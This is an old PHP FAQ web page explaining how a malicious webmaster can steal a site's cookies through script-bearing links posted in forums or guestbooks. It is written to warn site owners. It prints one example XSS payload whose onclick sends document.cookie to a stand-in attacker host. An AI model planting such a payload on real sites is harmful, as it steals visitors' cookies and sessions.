Categories:
.NET (357)
C (330)
C++ (183)
CSS (84)
DBA (2)
General (7)
HTML (4)
Java (574)
JavaScript (106)
JSP (66)
Oracle (114)
Perl (46)
Perl (1)
PHP (1)
PL/SQL (1)
RSS (51)
Software QA (13)
SQL Server (1)
Windows (1)
XHTML (173)
Other Resources:
How Can Other Webmaster Steal Your Cookies
How Can Other Webmaster Steal Your Cookies? - PHP Script Tips - Understanding and Managing Cookies
✍: FYIcenter.com
All browsers are following the security rule that your cookies are sent back only to your Web servers. They will not be sent to other Webmaster's Web server directly. However, other Webmaster may design some malicious JavaScript codes to steal cookies created by your PHP pages. For example, if you allow visitors to post messages in your forum, comment area, or guestbooks with hyper links. A bad Webmaster who owns a Web site called www.badwebmaster.com could post a message like this on your Web site with a malicious hyper link:
<a href="/#" onclick="window.location='http://www.badwebmaster.com /stole.cgi?text='+escape(document.cookie); return false;"> Click here to get your free gift!
If your visitor clicks this hyper link, all of your cookie values will be sent to this bad Webmaster's CGI program as part of the GET URL (not as cookies).
So check your forum, comment book or guestbook program. And do not allow visitors to post messages with client side scripts.
2007-04-23, 5321👍, 0💬
Popular Posts:
How do you target a specific frame from a hyperlink? Include the name of the frame in the target att...
How can we implement singleton pattern in .NET? Singleton pattern mainly focuses on having one and o...
What is the difference between "calloc(...)" and "malloc(...)"? 1. calloc(...) allocates a block of ...
How To Test Transaction Isolation Levels? - MySQL FAQs - Transaction Management: Commit or Rollback ...
How To Create an Add-to-NewsGator Button on Your Website? - RSS FAQs - Adding Your Feeds to RSS News...